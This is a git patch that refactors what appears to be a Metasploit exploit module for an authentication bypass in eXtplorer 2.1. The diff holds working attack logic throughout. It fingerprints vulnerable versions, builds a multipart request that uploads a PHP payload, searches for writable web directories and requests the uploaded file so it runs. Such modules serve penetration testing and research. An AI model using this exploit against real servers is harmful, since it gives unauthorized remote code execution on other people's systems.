From 52157b91246af136a70bb1b0e92ef8a87b3486bb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 9 Jan 2013 19:45:17 +0100 Subject: [PATCH] extplorer_upload_exec cleanup --- .../multi/http/extplorer_upload_exec.rb | 75 +++++++++---------- 1 file changed, 34 insertions(+), 41 deletions(-) diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index b8b9213ab4..12e1ec1dc2 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -30,16 +30,13 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability'], - ['URL', 'http://extplorer.net/issues/105'] + [ 'OSVDB', '88751' ], + [ 'BID', '57058' ], + [ 'URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability' ], + [ 'URL', 'http://extplorer.net/issues/105' ] ], 'Payload' => { - 'BadChars' => "\x00" - }, - 'DefaultOptions' => - { - 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, @@ -71,9 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "#{base}extplorer.xml" }) - return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /2\.1\.(0RC5|0|1|2)<\/version>/ - return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/ - return Exploit::CheckCode::Safe + if !res or res.code != 200 + return Exploit::CheckCode::Safe + end + + if res.body =~ /2\.1\.0RC[012]<\/version>/ + return Exploit::CheckCode::Vulnerable + end + + if res.body =~ /eXtplorer/ + return Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{peer} - Connection failed") end @@ -92,29 +98,22 @@ class Metasploit3 < Msf::Exploit::Remote def upload(base, dir, fname, file) - boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}" - data_post = "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"userfile[0]\"; filename=\"#{fname}\"\r\n" - data_post << "Content-Type: application/x-httpd-php\r\n" - data_post << "\r\n#{file}\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n%2f#{dir}\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n" - data_post << "--#{boundary}\r\n" + data = Rex::MIME::Message.new + data.add_part(file, 'application/x-httpd-php', nil, "form-data; name=\"userfile[0]\"; filename=\"#{fname}\"") + data.add_part("on", nil, nil, "form-data; name=\"overwrite_files\"") + data.add_part("%2f#{dir}", nil, nil, "form-data; name=\"dir\"") + data.add_part("com_extplorer", nil, nil, "form-data; name=\"option\"") + data.add_part("upload", nil, nil, "form-data; name=\"action\"") + data.add_part("xmlhttprequest", nil, nil, "form-data; name=\"requestType\"") + data.add_part("true", nil, nil, "form-data; name=\"confirm\"") + + data_post = data.to_s + data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}index.php", - 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post, 'cookie' => datastore['COOKIE'], }) @@ -149,8 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ print_status("#{@peer} - Authenticated successfully") else - print_error("#{@peer} - Authentication failed") - return + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") end # search for writable directories @@ -163,8 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root", }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" @@ -182,12 +179,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ print_good("#{@peer} - File uploaded successfully") else - print_error("#{@peer} - Uploading PHP payload failed") - return + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end # search directories in the web root for the file @@ -200,8 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') @@ -218,8 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/#{dir}/#{@fname}" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code != 200 print_error("#{@peer} - Executing payload failed")